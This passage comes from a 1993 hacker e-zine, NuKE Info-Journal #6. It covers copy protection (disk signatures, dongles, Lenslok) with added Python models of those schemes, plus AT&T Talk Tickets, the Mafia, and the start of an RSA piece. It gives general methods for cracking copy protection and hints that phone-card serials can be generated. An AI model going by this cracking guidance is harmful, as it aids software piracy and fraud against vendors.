space, and therefore the number of bits, and therefore the total number of bits
on the track, depends on the rotational speed of the disk drive. If the bits
are counted, and the count is recorded somewhere else on the disk, the software
can compare the number of bits to the count every time the disk is booted. If
a duplicate is made on a different drive, the duplicate disk will have a
different number of bits on that track, and the count will fail. Even small
variations in the speed of a single drive will cause different disks made
on that drive to have different numbers of bits per track, so that each disk
has a different signature.
This is an _extremely_ difficult protection method for bit copiers to overcome.
Some versions of Locksmith included a utility that prompted the user to adjust
the speed of the drive (by turning a vernier with a screwdriver) until it
matched the apparent speed of the drive on which the original disk was
recorded. E.D.D. (Essential Data Duplicator), however, used a variable timing
loop to vary the rate at which the bits are recorded on the destination disk,
to compensate for the speed of the destination disk drive. These methods
required a great deal of trial-and-error to make satisfactory duplicate disks.
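Added example, not from the article: a constructed model of the two
speed-dependent tricks described above, the `slow drive' recording and the
bit-count signature. The nominal 300 RPM and 250 kbit/s of a 5.25 inch
double-density drive are real figures; the per-sector overhead and the
tolerance of the signature comparison are assumed for the example.

```python
# Added example (not from the article): how drive speed turns into a
# copy-protection signature and into the `slow drive' overflow trick.
# Nominal figures for a 5.25" double-density drive: 300 RPM, 250 kbit/s.
NOMINAL_RPM = 300.0
BIT_RATE_HZ = 250_000            # bit cells written per second
SECTORS_PER_TRACK = 9
SECTOR_BYTES = 512
# Assumed per-sector overhead (address field, gaps, marks, CRCs); the
# exact value does not matter, only that it is fixed at format time.
OVERHEAD_BITS_PER_SECTOR = 62 * 8


def bits_per_revolution(rpm: float, bit_rate_hz: int = BIT_RATE_HZ) -> int:
    """Bit cells that pass under the head during one revolution.

    A slower drive takes longer per revolution, so more bits fit on the
    track; a faster one fits fewer.
    """
    if rpm <= 0:
        raise ValueError("rpm must be positive")
    return int(round(bit_rate_hz * 60.0 / rpm))


def track_gap_bits(rpm: float) -> int:
    """Filler bits left between the last sector and the first one.

    The formatter writes meaningless bits into this space; its length is
    what the `bit counting' signature records and later re-checks.
    """
    used = SECTORS_PER_TRACK * (SECTOR_BYTES * 8 + OVERHEAD_BITS_PER_SECTOR)
    gap = bits_per_revolution(rpm) - used
    if gap < 0:
        raise ValueError("sectors do not fit on the track at this speed")
    return gap


def signature_matches(stored_count: int, measured_count: int, tolerance: int = 8) -> bool:
    """Compare the count recorded at duplication time with a fresh count.

    The tolerance (assumed here) absorbs the normal jitter of one drive.
    A copy made on a drive only 1% faster or slower is hundreds of bits
    off and fails the check.
    """
    return abs(stored_count - measured_count) <= tolerance


def slow_drive_overflow(record_rpm: float, copy_rpm: float) -> int:
    """Bits of a track recorded at record_rpm that do not fit into one
    revolution of a destination drive turning at copy_rpm.

    Anything above zero means the tail of the track wraps around and
    overwrites its head on the copy, as described above.
    """
    return max(0, bits_per_revolution(record_rpm) - bits_per_revolution(copy_rpm))


if __name__ == "__main__":
    stored = track_gap_bits(NOMINAL_RPM)        # count saved on the original
    print("gap bits on the original:", stored)
    for rpm in (300.02, 297.0, 303.0):
        print(f"copy made at {rpm} RPM passes:", signature_matches(stored, track_gap_bits(rpm)))
    print("bits that overflow when a 290 RPM master is copied at 300 RPM:",
          slow_drive_overflow(290.0, 300.0))
```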
% Deliberately Damaged Media %
This method consists of deliberately damaged media: a disk which is damaged
in a predictable way that can be detected by the software. The damage serves
as a signature. An example is the `Prolok' system by Vault Corporation. Prolok
is a special disk sold to software companies to publish their programs on. The
disk includes software that may be adapted to work with any application program
the software publisher records on the disk. The signature is a small hole, cut
by laser, in the recording surface of the disk. The Prolok software can detect
this hole because it is an area on which no data can be recorded, a bad sector.
Prolok is actually quite easy to defeat for a programmer. The technique
was to insert a small TSR program hooked to int 13h, which would review
all requests by programs to the DOS. If Prolok asks the DOS to read the area
of the disk where the hole is, the TSR captures the request and forges a
reassuring response. There was also a public domain program specifically
designed to defeat Prolok, called FUProlok.
In general ALL these disk-based copy-protection methods had one major flaw:
they all had some easy pattern that would enable us to defeat them easily. The
pattern was the usage of Int 13h; the knowledgeable `cracker' would construct
a simple generic TSR that hooked Int 13h and created a break-point (Int 3h)
whenever the interrupt was called. From there the knowledgeable cracker could
trace through the code, and see if the information obtained by the Int 13h
call was used in a peculiar way. Most programs are written in a high level
language, so the use of Int 13h is not common; therefore get to the bottom of
the Int 13h
% Difficulties of Disk-based Copy-protection %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The major obstacle to disk-based copy-protection was the hard disk.
Hard disk users were not content to run programs from floppy disks; they
all but insisted on transferring the software to the hard disk. One solution
that was adopted was for the program to execute itself from the hard disk,
but to also require the floppy to be left in its drive. The floppy was usually
referred to as a `key disk', which was periodically checked to validate the
signature.
The major problem was that it didn't allow the user to have access to his
floppy drive while using the hard disk. Another bad side effect was that it
prevented users connected to a network from executing more than one copy
at the same time, as you only had one copy of the `key disk' to go around.
And none of the `format' methods above can be used on a hard disk. In
general you cannot tamper with the structure of the hard disk, because it
may contain several hundred different applications. Also, the interface
system does not give the host computer direct control of details like
the number and arrangement of sectors per track or the count of bits on a
track.
================================================================================
================================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The `Arms Race' on Physical Protection -N
E- Devices : Round Two" Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% Physical Copy-protection Devices %
A physical protection device is usually a piece of equipment attached to a
computer, or used in conjunction with a computer, to protect software or data.
The majority of such devices are commonly referred to as `dongles', which are
electronic devices attached to the computer.
When dongle protection is used, no attempt is made to prevent the user or
owner of the package from creating additional copies of the software. The
device is designed to prevent unauthorised use, not unauthorised copying.
The origin of the word `dongle' is obscure, but it arose about 1978-79
and is believed to have been first used to protect the `Wordcraft' package
on the Commodore Pet.
% Dongles - A Simple Dongle Design %
The first problem in designing a dongle is finding some method of attaching
the device to the hardware. It must be a method which is available on the
standard minimum configuration machine on which the software is intended to
run. The _most_ obvious choice is the serial interface port, of which nearly
every machine has at least one, especially with the increased use of mice and
modems, which require serial connections. Assuming further that we do not wish
to use this port during the running of the program, then a very simple dongle
could be constructed using the standard cabling and reverse channel, so that
communications are made in both directions simultaneously. The wires would
have the following functions:
Sending Channel
~~~~~~~~~~~~~~~
Request to send      (Output when the computer is ready to go)
Clear to send        (Received when the terminal is ready)
Transmit data        (Line for the computer to transmit the data)
Receiving Channel
~~~~~~~~~~~~~~~~~
Data Terminal Ready  (Output when the computer is ready to receive data)
Data Set Ready       (Received when the terminal is ready to transmit)
Receive Data         (Line for the computer to receive the data)
Carrier Detect       (Line for the modem to signal the computer that another
                      modem's signal has been found via the telephone)
Ring Detect          (Line for the modem to signal the computer that a
                      ringing tone has been received)
Assume that wires are used to connect the signals as shown below:
Standard output Standard inputs
~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
Transmit data..........Data Set Ready
Request to send........Receive Data
Data terminal ready....Ring Detect
This is a bizarre combination, which is extremely unlikely to be used by
design with any sort of equipment. To protect our dongle we further seal
the plug casing with pitch or epoxy resin so that the details of the wiring
cannot be seen without melting out or drilling away the resin.
The representation of a `U' character in the standard ASCII code will appear
as a square wave. This is because the character itself has the binary value
0101 0101, and, taken with the character beginning pulse (start bit) and the
character ending (stop bit), this makes up the square wave signal 1 0101 0101 0:
     +6v -+ +-+ +-+ +-+ +-+ +-+
          | | | | | | | | | | |
      0   | | | | | | | | | | |
          | | | | | | | | | | |
     -6v  +-+ +-+ +-+ +-+ +-+ +-
Now transmit a stream of `U's. Since Transmit is connected to Data Set Ready,
that line will go up and down at intervals of one bit. By sampling this line
the program can test that the correct pattern is being transmitted and
received, which means the dongle is in place. This is perhaps a dongle suitable
for the computer hobbyist, but it is a rather poor attempt at a dongle, for
several reasons: it does not allow the use of the serial port, since the port
is needed for the dongle, so a mouse, modem or printer cannot be connected via
the serial port if you only have one.
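The loopback check described above, written out as an added example (this is
not code from the article, and not any vendor's dongle routine). The wiring
table and the `U' pattern 1 0101 0101 0 are the article's; the port model,
the `ModemLike' stand-in for an ordinary device, and the verification routine
are constructed here to show why the alternating pattern, rather than a line
that is merely high, is what proves the dongle is in place:

```python
"""Added example, not code from the NuKE article: a model of the serial
loopback dongle described above.  The wiring (Transmit Data to Data Set
Ready, Request To Send to Receive Data, Data Terminal Ready to Ring Detect)
and the `U' pattern 1 0101 0101 0 are the article's; the port model and the
verification routine are constructed here."""

# One framed `U' as the article draws it: start bit, 0101 0101, stop bit.
U_FRAME = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0]

IDLE = {"DSR": 0, "RXD": 0, "RI": 0, "DCD": 0}


class SerialPort:
    """Constructed model of an RS-232 port: the computer drives the output
    lines, and whatever is plugged in decides what the input lines show."""

    def __init__(self, device=None):
        self.device = device
        self.inputs = dict(IDLE)

    def drive(self, txd, rts, dtr):
        """Set the three outputs; inputs go idle unless the device acts."""
        self.inputs = dict(IDLE)
        if self.device is not None:
            self.device.respond(self, {"TXD": txd, "RTS": rts, "DTR": dtr})


class LoopbackDongle:
    """The article's `bizarre' wiring: three outputs looped straight back."""
    WIRING = {"TXD": "DSR", "RTS": "RXD", "DTR": "RI"}

    def respond(self, port, outputs):
        for src, dst in self.WIRING.items():
            port.inputs[dst] = outputs[src]


class ModemLike:
    """Constructed stand-in for a normal device that simply holds Data Set
    Ready high.  It must NOT pass the check."""

    def respond(self, port, outputs):
        port.inputs["DSR"] = 1


def dongle_present(port, repeats=4):
    """Send a stream of `U's and sample the looped-back lines bit by bit.
    Every sample must equal what was just driven, on all three wires."""
    for i, bit in enumerate(U_FRAME * repeats):
        rts = i % 2            # constructed: wiggle the other outputs too, so
        dtr = (i // 2) % 2     # a device that only echoes TXD is not enough
        port.drive(bit, rts, dtr)
        sampled = (port.inputs["DSR"], port.inputs["RXD"], port.inputs["RI"])
        if sampled != (bit, rts, dtr):
            return False
    return True


if __name__ == "__main__":
    print("dongle   :", dongle_present(SerialPort(LoopbackDongle())))
    print("nothing  :", dongle_present(SerialPort()))
    print("modem    :", dongle_present(SerialPort(ModemLike())))
```

The routine fails as soon as one sample disagrees, so an empty port (inputs
idle) and a device that holds Data Set Ready high both fail on the first low
bit of the pattern; only the loopback passes. It also makes the article's
complaint concrete: the check owns the port for as long as it runs.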
% Advanced Pseudo Random bit Generator Dongles %
Two new devices being marketed to software houses are Datakey (DES, 1988) and
Software Key (Bristol, 1988). The overall concepts of both are similar, and
they were in fact developed by the same inventor, although the two structures
are quite separate and the details of the devices differ a lot.
The devices are `active' dongles, meaning one end of the dongle plugs into the
computer, and whatever is normally connected to the RS232 port is connected to
the other end, and should be unaffected by the device.
In the Datakey, which is a bit-oriented device, toggling the Data Terminal
Ready line causes a single bit of data to be presented on the Data Set Ready or
the Data Carrier Detect line. By this means, a string of pseudo-random binary
data of any length can be read out of the device. Assembly language routines
are included with the device for linking into the software to be protected.
In the Software Key, special command codes are used to trigger the device,
which responds with a byte of pseudo-random data. Such sequences only repeat
after an extremely large number of operations.
% Software Sentinel %
The Software Sentinel (Sentinel, 1988) plugs into the parallel printer port of
an 80x86. The parallel channel was preferred to the serial channel since the
parallel channel is always present on many systems, even in the minimum
configuration. However, Sentinel also has a serial port version of this device,
called the Sentinel S.
% Dongle Cracking %
~~~~~~~~~~~~~~~~~~~
Some experts are scornful of the protection afforded by dongles. Some even
boast that 30 minutes would usually be sufficient to bypass any dongle
protection in any program. As a matter of fact, dongle cracking is actually
straightforward: simply find the routine that performs the dongle test. The
difficulty of this job really depends on how the software accesses the
dongle. If the software accesses the parallel/serial port via interrupt
functions, a simple TSR program can be written to `fool' the program into
believing a dongle is present, or one can simply trace through the code from
that point on to see what actually happens and what the program expects to get
back. However, I do not expect a program to use interrupts to access an I/O
port, for the sole reason that doing so makes it easy to break in via the
vector table. Chances are the software accesses the I/O port directly with the
built-in processor instructions (OUT/IN). So it will be up to the user to
disassemble the program to search for IN/OUT, INS/OUTS, INSB/OUTSB or
INSW/OUTSW instructions that access the parallel/serial ports. Once you locate
the routine that accesses the port, you may either reverse engineer it or set
a break-point and begin your journey of debugging.
Nevertheless, this does not nullify the credibility of dongle protection.
As a matter of fact, several new software packages use dongles to protect
themselves. But the fact remains that no software is 100% secure. Dongles
require software to `test' that the dongle is attached; therefore the
possibility of finding the `test' routine exists, and therefore modification
is possible.
% Lenslok % The Latest Physical Protection Device %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Lenslok device was also designed for the low-cost end of the software
market. The device consists of a plastic lens, rather like a pocket
magnifying glass, containing a series of prisms which cause anything viewed
through it to be seen as a confused jumble of different dots (pixels).
               Figure #1                    Figure #2
              1 2 3 4 5                    A B C D E
             +-+-+-+-+-+                  +-+-+-+-+-+
             | | |X| | |                  |X| | | | |
             +-+-+-+-+-+                  +-+-+-+-+-+
             | |X| |X| |                  | |X| |X| |
             +-+-+-+-+-+                  +-+-+-+-+-+
             |X| | | |X|                  | | |X| |X|
             +-+-+-+-+-+                  +-+-+-+-+-+
             |X| | | |X|                  | | |X| |X|
             +-+-+-+-+-+                  +-+-+-+-+-+
             |X|X|X|X|X|                  |X|X|X|X|X|
             +-+-+-+-+-+                  +-+-+-+-+-+
             |X| | | |X|                  | | |X| |X|
             +-+-+-+-+-+                  +-+-+-+-+-+
             |X| | | |X|                  | | |X| |X|
             +-+-+-+-+-+                  +-+-+-+-+-+
The letter `A' normally looks like the pattern in figure #1. Scrambled, it
could look like the pattern shown in figure #2; all that was done was that
columns 1 & 3 were interchanged. So if we took columns A & C and swapped them,
we would get the character `A' once again. The Lenslok then consists of a
simple optical system: two shallow angled grooves cut into the plastic which
change over the columns.
So, the user would apply the `lens' to the screen, over the jumbled pattern
of dots, and press a key until the pattern appears correctly through the prism.
Therefore, in a Lenslok protected system, you may have a scrambled word which
the system asks you to respond to, whereby you would take the lens, pass it
over the characters, and voila.
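The column swap in the two figures, as an added example (this is not code from
the article or from the Lenslok product). The 5x7 glyph for `A', the swap of
columns 1 and 3, and the extra `ROTATE' permutation are constructed here; the
lens is modelled as the inverse permutation, which for a plain swap is the
swap itself, and the example goes one step beyond the figures by showing a
permutation that is not its own inverse:

```python
"""Added example (not from the NuKE article, and not Lenslok's own code):
the Lenslok scramble modelled as a permutation of bitmap columns.
The glyph, the swap of columns 1 and 3, and the `lens' permutations are
all constructed here to match the article's figures."""

# The letter `A' as drawn in figure #1 (X = lit pixel, . = dark).
GLYPH_A = [
    "..X..",
    ".X.X.",
    "X...X",
    "X...X",
    "XXXXX",
    "X...X",
    "X...X",
]

# A permutation is a list: output column j shows input column perm[j].
# Figure #2 swaps columns 1 and 3 (0-based indices 0 and 2).
SWAP_1_3 = [2, 1, 0, 3, 4]


def permute_columns(rows, perm):
    """Rebuild every row so that column j holds the input's column perm[j]."""
    return ["".join(row[src] for src in perm) for row in rows]


def invert(perm):
    """Inverse permutation: undoes permute_columns(rows, perm)."""
    inv = [0] * len(perm)
    for j, src in enumerate(perm):
        inv[src] = j
    return inv


def scramble(rows, perm=SWAP_1_3):
    """What the program draws on screen: the glyph with its columns moved."""
    return permute_columns(rows, perm)


def unscramble(rows, perm=SWAP_1_3):
    """What the lens does optically: move the columns back.  The lens is the
    inverse permutation, which for a plain swap is the swap itself."""
    return permute_columns(rows, invert(perm))


def render(rows):
    """Draw a bitmap in the boxed style of the article's figures."""
    border = "+" + "-+" * len(rows[0])
    lines = [border]
    for row in rows:
        lines.append("|" + "|".join(" " if c == "." else "X" for c in row) + "|")
        lines.append(border)
    return "\n".join(lines)


if __name__ == "__main__":
    print("Figure #1\n" + render(GLYPH_A))
    print("Figure #2\n" + render(scramble(GLYPH_A)))
    print("Through the lens\n" + render(unscramble(scramble(GLYPH_A))))
```

Because the same permutation is applied to every glyph, the lens works for any
word the program chooses to scramble; the secret is the permutation cut into
the plastic, not the word on screen.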
% Cracking all together now... %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lenslok is a great physical copy-protection: it is low-cost, and it can be
used in conjunction with the `Document Protection' currently widely used in
several low-cost software packages, especially in home entertainment computer
games. Document protection is where the program, usually at the beginning,
will stop for a moment and ask you a question whose answer is only to be found
in the documents supplied with the original package. Nevertheless, document
protection is fairly weak, as documents can be easily photocopied. They can
also be scanned as a computer image and easily distributed, through computer
modems, into the computer BBS scene.
So to an extent Lenslok can help document protection, as a lens is not easily
copied by your average computer hobbyist. So even though a copy of the
documentation is made, how are we to know what exactly it (the software)
is asking us for?
All together now: _ALL_ protection schemes developed so far can be broken, be it
Lenslok, dongles or disk-based protection schemes. This is because all
protection schemes have to use some sort of software that will `test' and
decide whether this is an authorised copy or not. The fact of the matter is
that there is a terrible weak spot. Software protectors have developed
_amazing_ protection schemes; the `front' of the protection is almost
unbreakable. Imagine a castle in medieval times, with a moat around the castle,
the moat containing deadly man-eating animals; the front of the castle also has
men waiting with boiling oil to throw over you, and several men with bows and
arrows waiting to kill you. Now, how effective is this if somebody leaves the
back gate unlocked? Sure, it may be nearly impossible to get through by the
front, but the back gate is unguarded. The same applies to copy-protection,
where the fact of the matter is that nobody has done anything about low-level
entry! Anyone capable of 80x86 structured assembly language can bypass a
copy-protection. The only problem is finding the routine; this is a challenge
in itself, as it is rarely just a CMP instruction. For some reason NPC members
think that CMP is all there is to look for! Aren't they accomplished crackers?
Cracking involves a lot of time, extreme knowledge of the 80x86, and a few
tricks of the trade. If a document check awaits you to type an answer, you
will need to set a break-point at that exact location. Ctrl-Break will
_rarely_ work, so you will have to make tools of your own that will allow you
to exit at the desired location. Protected software usually overwrites
Int 3h and Int 1h to avoid break-points, so you will have to devise your own
break-point type program, perhaps one hooked to Int 9h, so that at ALT-A it
will execute an Int 3h, and at the same time you will enter your debugger entry
point back into Int 3h. I would hook my TSR to Int 5h, and on Print-Scrn it
would load the debugger. Many times you would have to put a special routine
on Int 8h or 1Ch to make sure that your entry point is not erased from the
vector table; there's an unlimited number of possible combinations, I certainly
cannot name them all. But what I can do is give you the theory of the
protection scheme, and you can devise your own pleasing method. Many people
enjoy reverse engineering jobs; some (like myself) take note of all system
I/Os and interrupts being called, and work my break-point from there.
But this two-part article was to give you an understanding of how some copy-
protection schemes work. The _only_ way one can attempt to defeat the
protection is to understand how the protection works. Then your attempts to
bypass it will be much more effective, rather than taking an ineffective
guess. Be direct, go directly to the source of the conflict, and don't waste
your time on anything else. So I do hope this has been a learning experience
for at least some. If the demand is there, in the following news journal we may
focus on effective cracking techniques, and some tricks and tips to avoid
falling into a ditch.
Rock Steady/NuKE
===============================================================================
===============================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "AT&T Talk Tickets" -N
E- Nu
-N uK
Nu By KE
uK Nowhere Man E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Introduction
~~~~~~~~~~~~
As many people know, many countries throughout the world have begun
installing a new pay phone system which takes "phone cards" in addition to
or instead of coins. These phone cards are unlike U.S. calling cards;
rather, they are more like credit cards: they have a magnetic strip which
holds the value of the card. You buy a card in a certain denomination
(say $10) and then you can place that amount of calls with the card. The
U.S., however, is unwilling and unable to implement such a program.
(Remember, this is the country which brings you the English System of
measurement!) Not only would it cost too much, so they say, but there is
also a problem not found in most other countries -- competition. Pay phones
may be owned by anyone, from the local phone company to the foreigner who
owns the local Duncan Doughnuts; to get everyone to agree to a standard and
to replace existing phones with card-ready phones would be unfeasible. So
now AT&T and U.S. Fibercom are introducing an alternative: "Talk Tickets."
What are Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~
Talk Tickets are not magnetic-striped cards or calling cards; they're a
strange cross between both. You'll be able to purchase a Talk Ticket in a
certain denomination, each carrying a certain number of $0.60 "units."
Cards will be available in 5, 10, and 50 unit ($3, $6, and $30)
denominations. The card itself is a small cardboard ticket bearing a
unique eleven-digit serial number (and some rate/call information). You
call an 800 number and a voice prompts you for your ticket number. Once
you've entered a valid number, the voice will tell you how much money is
left on the ticket (you don't have to use the full value of the ticket on
one call; leftover time is kept track of). Then you place your call, just
as if you were dialing from a normal line, with a few exceptions: there
are special "star" services you can dial, recordings costing one unit each
(like 976 numbers), and international calls do not require the usual "011"
prefix. The call is then handled normally; however, if your ticket runs out
of credit during the call you are abruptly disconnected.
Costs
~~~~~
As mentioned before, calls are billed in $0.60 units. The chart below
gives the cost, in units per minute, for calling various locations.
Area                              Units/Minute
~~~~                              ~~~~~~~~~~~~
*1 (Sports News)                        1
*2 (World News)                         1
*3 (U.S. Weather)                       1
Asia (incl. Australia and NZ)           5
Africa                                  5
Canada                                  3
Europe (except former U.S.S.R.)         4
Russia/Former U.S.S.R.                  5
South America                           4
United States (incl. AK and HI)         1
These rates are much higher than standard calling card or direct-dial
rates -- a call to Europe is $2.40/minute, Canada is $1.80/minute, and
Asia is a whopping $3.00/minute. This is cheaper than a coin call from a
pay phone, but other than that it's extremely expensive.
Where do I get Talk Tickets?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Right now Talk Tickets are available on a limited trial basis via
McDonald's. That's right, McDonald's. Three-unit Talk Tickets will be
given away free in Super-Value Meals until June; the catch is that it's a
limited trial offer, available only in the following areas: New York City,
Buffalo/Syracuse, Baltimore, Pennsylvania, and Wisconsin. You can also get
them via Patrick Townson, moderator of the Telecom Digest on the Internet
(ptownson@eecs.nwu.edu), for $2 per four units (or $1.50/card in groups of
ten or more). In addition, Talk Tickets should soon be on sale at AT&T
phone centers near you...
Important Numbers
~~~~~~~~~~~~~~~~~
The 800 Talk Ticket access number is 800-331-0888. For more information
about the Talk Ticket program, call 800-462-1818 (outside the U.S. call
408-428-2734 collect). The operator will be happy to answer your
questions about the Talk Ticket program.
Hacking Talk Tickets
~~~~~~~~~~~~~~~~~~~~
I'm sure the first thing you thought of when you read about Talk Tickets is
"how can I abuse them." Well, there's really no reason to. First off,
the serial number is eleven digits -- however, it's created algorithmically,
meaning it *can* be hacked. However, even if you do manage to generate
your own Talk Ticket numbers, it's not of much value if you're calling
outside the U.S. You can get almost an hour within the country on a 50
unit ticket, but that same ticket would only get you about 12 minutes to
Europe or 10 minutes to Asia. You're better off not wasting your time;
calling cards are much better.
Conclusion
~~~~~~~~~~
SAVE YOUR MONEY. There is little reason to use the Talk Ticket program.
Calling card calls are much cheaper -- heck, even hotel surcharges are
usually less costly! In addition, the potential for abuse is limited; the
most you could defraud would be 10 minutes to Australia, big deal. The one
key advantage, though, that the tickets offer is anonymity. You are just
a number, and unlike with a calling card, you pay cash up front and are
not billed directly, so your privacy is maintained. So, unless you need the
protection (and are willing to pay through the nose for it!) AT&T Talk
Tickets are a waste of time and money.
Nowhere Man/NuKE
===============================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Mafia, Incorporated." -N
E- Italy's underworld extends its reach Nu
-N uK
Nu By KE
uK The Godfather E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Like any business bursting at the seams of its own success, the Mafia
and its allies know no borders. Born of a transatlantic axis, the Mafia
has forged alliances wherever it has needed to, sponsoring indigenous crime
syndicates or helping rivals to wipe each other out. The manipulation of the
Turkish heroin "Babas" or the drug barons of Colombia has become a model of
how to operate an empire to the conquering power's advantage. Internationally,
the Mafia is stronger than ever before; recent attempts at a crackdown show
it to be expanding with speed in Russia and other post-communist countries,
buying up chunks of the economy, laundering money, dealing with local
gangsters, and preparing to create and cultivate an eager market for hard drugs.
The Mafia runs the world's drug-dealing business, and its wealth is
inestimable. The giddy profits from South America, the US, and the Far East
are laundered, recycled, and hidden by the best wizards in the money business
across an impenetrable labyrinth of `legal' commercial activities.
"They would do well to go to Harvard Business School," says Leoluca Orlando, the
ousted anti-Mafia mayor of Palermo, Sicily. This statement is probably true;
however, it may be hard to put to the test, because to `protect' the empire the
Mafia must kill. And however wide its intercontinental span, it kills mainly
on its own ground and at its nerve centre, where it has, until now, enjoyed
relative impunity: in Italy.
A bombing this time last year (May 1992) killed Judge Giovanni Falcone, one
of the few men _ever_ to momentarily check the squalid advance of the Mafia.
Mr. Falcone was described as "The world's _most_ wanted man!", wanted, that is,
by the Mafia. Mr. Falcone held assortments of documentation and knowledge
of the Mafia's structures, therefore posing a great threat to the Mafia, and
was killed by the Mafia. After the killing of Mr. Falcone, who was one of the
world's _most_ protected men, who was to challenge the Mafia and continue Mr.
Falcone's work?
Two months later, a `fake' construction crew, pretending to repair a segment
of the highway, placed a bomb under that `repaired' segment of road. The
bomb was set off just as Paolo Borsellino passed underneath it in his limo.
Paolo Borsellino had _secretly_ taken over from Falcone as head of the
Anti-Mafia group in Palermo. How did the Mafia find out so quickly? The Mafia
has extremely loyal men at almost all levels of government, and
someone tipped the Mafia off that Mr. Borsellino was to head a new Anti-Mafia
government agency in Rome. With this simple message of triumphant mockery,
the Mafia confirmed that it will wage its latest, and potentially its
bloodiest, battle against Italian society with a sick blend of fury and cool,
diabolical arrogance.
This time the Mafia's violence is not between clans, nor is it the _usual_
picking off of inconvenient politicians and judges at intervals of years. This
time the offensive is against the opposition, terrorizing a rebelling populace
back into submission. Following Borsellino's assassination, the Italian
authorities sent in troops for the first time against the Cosa Nostra. Nobody
_ever_ dared to go against the Cosa Nostra! The Cosa Nostra has grown from what
was believed to be a band of gangsters operating out of the chaos of postwar
Sicily to become, in 47 years, an unchallenged and unchallengeable global crime
syndicate. The officials and troops are shadowboxing, and judges have resigned,
saying that their work is pointless, their lives are undefended, and their
investigations are blocked from on high. The killers of Falcone and Borsellino
want to show that they can kill with impunity and that they are protected from
within the system.
Almost _every_ time the judiciary peels away the covers of Italian high finance,
construction, tourist development, local politics, or public-sector spending
excesses, it finds the Mafia. Every illegal arms deal and, of course, every
drug haul leads directly to the Mafia.
There seems to be no obvious explanation for its success other than ruthless
cruelty, unfettered greed, friends in high places, and the perpetuation of
the picturesque and bogus mythology in which the Mafia's squalid operation is
gift-wrapped for Hollywood and young inmates alike. The `super-boss' of this
awesome empire, on the run since 1969 and the world's most wanted man, is
Salvatore `Don Toto' Riina, head of the clan from Corleone, the town that
gave its name to Francis Ford Coppola's glitzy `Godfather' clan. Riina was the
right-hand man to Luciano Liggio, who was arrested one night in 1973 while
reading Kant's `Critique of Pure Reason' and has been imprisoned ever since.
Liggio had built up the Corleone clan, the main victors of the Mafia war of
1981-83 that left the defeated clans obliged to work as clients, subject to
Corleone approval.
Riina and his partner, Bernardo Provenzano, known as `The Beasts', carried out
Liggio's orders. Riina is wanted for ordering some 150 murders and is said to
have committed 40 himself. They were the founders of the empire.
Perhaps most extraordinary, Riina is the man whom authorities believe finally
subjugated the New York wing of the Mafia not only to Sicily but to his clan.
Authorities also confirm that the Corleone clan manages the affairs of the
Sicilian's long-standing colony in South America, notably in Venezuela. The
Cuntrera and Caruana families from Agrigento, are now prime managers of
South America's current cocaine surplus.
The most recent meeting ever to be recorded by the authorities took place on
Valentine's Day 1989: a meeting at the Elysee hotel in Nice of members of a
consortium comprising the Sicilian Mafia, the giant Mafia, the octopus, along
with two divisions of the Italian crime empire: the Calabrians and the Camorra
of Naples. Representatives of the Colombian and Venezuelan cartels were also
present. The outcome of this meeting was an alliance and a carving up of the
trade bringing heroin from the East and cocaine from South America. By and
large, the Sicilians kept the heroin routes and a foothold in the white-powder
trade, the Calabrians won a lucrative client role in heroin, and the Camorra
emerged as the specialists in cocaine. The Camorra's international interests
span South America and the Spanish and French Rivieras. It has drug peddling
bases in Holland and Germany.
For the first time, the Mafia faces a new enemy: its own subjects. The
rebellion appeared in the last few years, when Leoluca Orlando, mayor of
Palermo, promised to confront the Cosa Nostra. He _did_ expel the Mafia
from city hall. The revolt went on: Libero Grassi, a businessman in Capo D'
Orlando, refused to pay his small protection fee; he was shot as a lesson
to others. The killing of the two judges (Falcone & Borsellino) provoked street
rebellions, general strikes, and the biggest demonstration in Italy's
history.
The fear of violence has led the European Community (EC) to fight back!
Europol, the European Police, until recently had been nothing more than a
harmless paper entity. But this was to change starting January 1st, 1993.
Today, Riina is held at Rebibbia prison in Rome, where interrogation has
already begun. So far, Riina has refused to cooperate with his captors, who
nevertheless say that he is behaving `with the politeness of a Sicilian that
does not exist any more'. Riina was arrested in Palermo, Sicily in February
1993. During the period of surveillance, which began soon after the
assassination of judge Giovanni Falcone, Riina met with politicians of the
highest level.
Organized crime has long operated internationally, with no boundaries; perhaps
Europol is exactly what is needed, a police force with no boundaries? And was
Europol the result of Riina being captured? Many would disagree. Nevertheless
the Mafia continues, with or without Riina.
1993 will be a dreadful year for the Mafia, and it is yet to end. One of the
`Big' players, Riina, is gone; what happens now?
"L'appetito viene mangiando"
Translation: Eating makes you hungry.
The Mafia, already fed to bursting, remains very hungry indeed.
================================================================================
================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Rivest, Shamir, Adleman, (RSA) Encryption" -N
E- Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Ahh, the last NuKE Informational Journal, #5, concerning DES encryption,
brought about a fair number of generous reviews. It has even inspired me to
continue this topic of `Digital Security'; henceforth I introduce to you RSA.
Rivest, Shamir and Adleman (RSA) are the three mathematicians who patented the
